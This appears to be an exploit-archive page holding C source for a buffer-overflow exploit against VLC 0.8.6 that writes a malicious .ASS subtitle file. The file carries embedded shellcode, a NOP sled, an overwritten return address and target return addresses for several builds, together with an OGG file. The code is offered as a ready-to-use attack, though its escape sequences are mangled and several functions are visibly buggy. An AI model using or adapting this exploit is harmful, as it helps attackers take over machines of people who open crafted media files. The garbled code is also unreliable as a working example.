VLC v0.8.6 [b][c][d][a] .ASS file buffer overflow exploit(win32 universal)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : VLC v0.8.6 [b][c][d][a] .ASS file buffer overflow exploit(win32 universal)
# Published : 2010-01-17
# Author : fl0 fl0w
# Previous Title : Audiotran v1.4.1 direct RET BOF
# Next Title : Kenward zipper v1.4 0day Stack Buffer Overflow PoC exploit
/*[%]VLC vs 0.6.8 [b][c][d][a] .ASS file buffer overflow exploit(win32 universal)
  [%]Works every time,works on any win32 OS,tested on Windows xp sp2.
  
  [%]My doctor said that I have seriuouse problems ,but I think he's full of it
     because the voices tell me I'm ok!*/
#include<stdio.h>
#include<string.h>
#include<stdint.h>

#define File            "subtitle666.ass"
#define OGGfile         "openme.ogg"
#define IF(x,NULL)      if(x==NULL)
#define FOR(i,a,b)      for(i=a;i<b;++i)
#define WHILE(z)        while(z>0)
#define is_bigendian()  ((*(char*)&i)==0)
#define EIP_OFFSET      163852
#define SEH_OFFSET      165248
#define NEXTSEH_OFFSET  165244   
/*-------------prototypes---------*/
   //100% working shellcode
   char vlcshellcode[]=
   {
        "x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x3d"
        "xbaxb1xd9x83xebxfcxe2xf4xc1x52xf5xd9x3dxbax3ax9c"
        "x01x31xcdxdcx45xbbx5ex52x72xa2x3ax86x1dxbbx5ax90"
        "xb6x8ex3axd8xd3x8bx71x40x91x3ex71xadx3ax7bx7bxd4"
        "x3cx78x5ax2dx06xeex95xddx48x5fx3ax86x19xbbx5axbf"
        "xb6xb6xfax52x62xa6xb0x32xb6xa6x3axd8xd6x33xedxfd"
        "x39x79x80x19x59x31xf1xe9xb8x7axc9xd5xb6xfaxbdx52"
        "x4dxa6x1cx52x55xb2x5axd0xb6x3ax01xd9x3dxbax3axb1"
        "x01xe5x80x2fx5dxecx38x21xbex7axcax89x55xc4x69x3b"
        "x4exd2x29x27xb7xb4xe6x26xdaxd9xd0xb5x5exbaxb1xd9"
   };      
   char data[]= 
   { 
        "[Script Info]n"
        "; Script generated by Aegisubn"
        "; http://www.aegisub.netn"
        "Title: Neon Genesis Evangelion - Episode 26 (neutral Spanish)n"
        "Original Script: RoRon"
        "Script Updated By: version 2.8.01n"
        "ScriptType: v4.00+n"
        "Collisions: Normaln"
        "PlayResY: 600n"
        "PlayDepth: 0n"
        "Timer: 100,0000n"
        "Video Aspect Ratio: 0n"
        "Video Zoom: 6n"
        "Video Position: 0n"
        "[V4+ Styles]n"
        "Format: Name, Fontname, Fontsize, PrimaryColour, SecondaryColour, OutlineColour, BackColour, Bold, Italic, Underline, StrikeOut, ScaleX, ScaleY, Spacing, Angle, BorderStyle, Outline, Shadow, Alignment, MarginL, MarginR, MarginV, Encodingn"
        "Style: DefaultVCD, Arial,28,&H00B4FCFC,&H00B4FCFC,&H00000008,&H80000008,-1,0,0,0,100,100,0.00,0.00,1,1.00,2.00,2,30,30,30,0n"
        "[Events]n"
        "Format: Layer, Start, End, Style, Name, MarginL, MarginR, MarginV, Effect, Textn"
        "Dialogue:"  
        "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" //165254 junk bytes to cause exception
   };         
   char banner[]=
   {
        "******************************************************************n"
        "       VLC 0.6.8x Buffer overflow exploit(win32 universal)      *n"   
        "                                                                 *n"       
        "                          by fl0 fl0w                            *n"
        "******************************************************************n"
   };  
   char arguments[]=
   { 
        "---------------------------n"
        "Too few args!              n" 
        "sploit.exe [target 1/2/3/4]n"
        "---------------------------n"
   };
   
    // data + 165254 nop + shellcode + szJMP(strcat)
  /*--------extern variables----------*/
     char b[1000000];
     char c[1000000];
     char d[1000000];
     char f[1000000]; //1402 bytes nop
     char seh[]="x87x75x40x4B";  
     char nseh[]="x38xFAx74x02";
     int i;
     int input;
     char bf[4];
     int t;
     
 /*-------prototypes----------*/
     int buildF();
     int cpy(unsigned int,char*);
     void print(char*);
     void gen_random(char*, const int);
     unsigned int getFsize(FILE*,char*);
     int cpystr(char* dest,int,int);
     int oggf(char* fname);
     int Targetprint();
     
 /*--------ogg file format---------*/    
    typedef struct aa
    {  //28 bytes or 224 bits
     uint32_t   Cp;    // Capture pattern &#65533; 32 bits           
     uint8_t    Ver;    // Version &#65533; 8 bits
     uint8_t    H;    // Header type &#65533; 8 bits
     uint64_t   Gp;   //  Granule position &#65533; 64 bits
     uint32_t   Bsn;  //   Bitstream serial number &#65533; 32 bits
     uint32_t   Psn;  //   Page sequence number &#65533; 32 bits
     uint32_t   C;    // Checksum &#65533; 32 bits
     uint8_t    Ps;    // Page segments &#65533; 8 bits
     uint8_t    St;    // Segment table 8 bit
    }ogg;
/*------targets------------*/
     struct 
     {
          unsigned int eip;
          char* etype;  
     }RET[]=
     {
     {
         0x026DFA38,
         "VLC 0.8.6       c"
     }, 
     {
         0x0263FA38,
         "VLC 0.8.6     b,d"
     }, 
     {
         0x0267FA38,
         "VLC 0.8.6       a"
     }, 
     {
         0x0267FA38,
         "VLC 0.8.6 b test1"
     }, 
     {
         0x02B6FA38,
         "VLC 0.8.6     RC1"
     }, 
     {
         NULL,NULL
     }
     };              
/*------main--------*/
    int main(int argc,char* argv[])
    {
          if(argc<2) 
          {
           system("CLS");
           
           printf("%s%s",banner,arguments); 
           
           Targetprint();exit(0);
           }
           
            input=atoi(argv[1]);           
          
            switch(input)
            {
                   case 0:
                   reverseInt(RET[0].eip);     
                   cpy(RET[0].eip,bf);       
                   break;
                   
                   case 1:
                   reverseInt(RET[1].eip);     
                   cpy(RET[1].eip,bf);
                   break;
                                 
                   case 2:
                   reverseInt(RET[2].eip);     
                   cpy(RET[2].eip,bf);
                   break;
                                        
                   case 3:
                   reverseInt(RET[3].eip);     
                   cpy(RET[3].eip,bf);
                   break;
                                               
                   case 4:
                   reverseInt(RET[4].eip);     
                   cpy(RET[4].eip,bf);
                   break;
            }
                   printf("[!]Using : %s retaddressn",RET[input].etype);
                   buildF(b);     oggf(OGGfile);     getchar();
         
        return 0;
    }  
    int buildF(unsigned int retn)
    {
        FILE *f=fopen(File,"wb");   
   
        IF(f,NULL)
        {
         print("File .ass error!"); exit(0);}  
         gen_random(b,165267); /*EIP offset 165267 bytes [EIP][NOP nopoffset=164667 bytes][SHELLCODE nopoffset+nrbytes nop]*/
         memcpy(b+EIP_OFFSET,bf,4);
         memset(b+EIP_OFFSET+4,0x90,10);
         memcpy(b+EIP_OFFSET+4+10,vlcshellcode,strlen(vlcshellcode)); 
         
         fprintf(f,"%s%s",data,b);    
          
         free(data); fclose(f);
           
         printf("[#]ASS file DONE!n",getFsize(f,File));
           
         return 0;
    }      
    int oggf(char* fname)
    {
       FILE* g=fopen(fname,"wb");
          IF(g,NULL)
          {
                print("File ogg error");
                exit(0);     
          }
                ogg *W666;
                W666=(ogg*)malloc(sizeof(ogg)); 
                W666->Cp=0x5367674F;
                W666->Ver=0x00;          
                W666->H=0x02;
                W666->Gp=0x00000000;                 
                W666->Bsn=0x000060B8;
                W666->Psn=0x00000000;
                W666->C=0xA403D2F8;
                W666->Ps=0x01;
                W666->St=0x1E;
         
                fwrite(W666,sizeof(W666),9,g);                                               
           
                fclose(g);    
           
                printf("[#]OGG file DONE!n",getFsize(g,OGGfile));  
                                    
                return 0;            
    }   
    int cpy(unsigned int source,char* dest)
    {
        int len;
        len=4;
        memcpy(dest,&source,len+1);
        return len;
    }     
    void print(char* msg)
    { 
       printf("[*]%sn",msg); 
    }    
  
    void gen_random(char *s, const int len) 
    {
      static const char alphanum[] ="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
    
      FOR(i,0,len)
      {
        s[i]=alphanum[rand()%(sizeof(alphanum)-1)];
      }
       s[len]=0;
      }
    unsigned int getFsize(FILE* g,char* gname)
    {
             unsigned int s;
            
             g=fopen(gname,"rb");
             
             IF(g,NULL)
             {
             print("File error at reading");
             exit(0);
             }            
             fseek(g,0,SEEK_END);
             s=ftell(g);
             
             return s;
    }
    int reverseInt(unsigned int i)
    {
             unsigned char c1, c2, c3, c4;
     
             if(is_bigendian())
    {
             return i;
    }else
    {
             c1=i&255;
             c2=(i>>8)&255;
             c3=(i>>16)&255;
             c4=(i>>24)&255;
             return((int)c1<<24)+((int)c2<<16)+((int)c3<<8)+c4;
    }
    }
    int cpystr(char* dest,int str,int len)
    {
      memset(dest,str,len+1);
      return len; 
    }
    int Targetprint()
    {
        print("Targets are:");
        for(t=0;t<5;t++) 
        printf("[!]%s - [0x%d] - %dn",RET[t].etype,RET[t].eip,t);
    }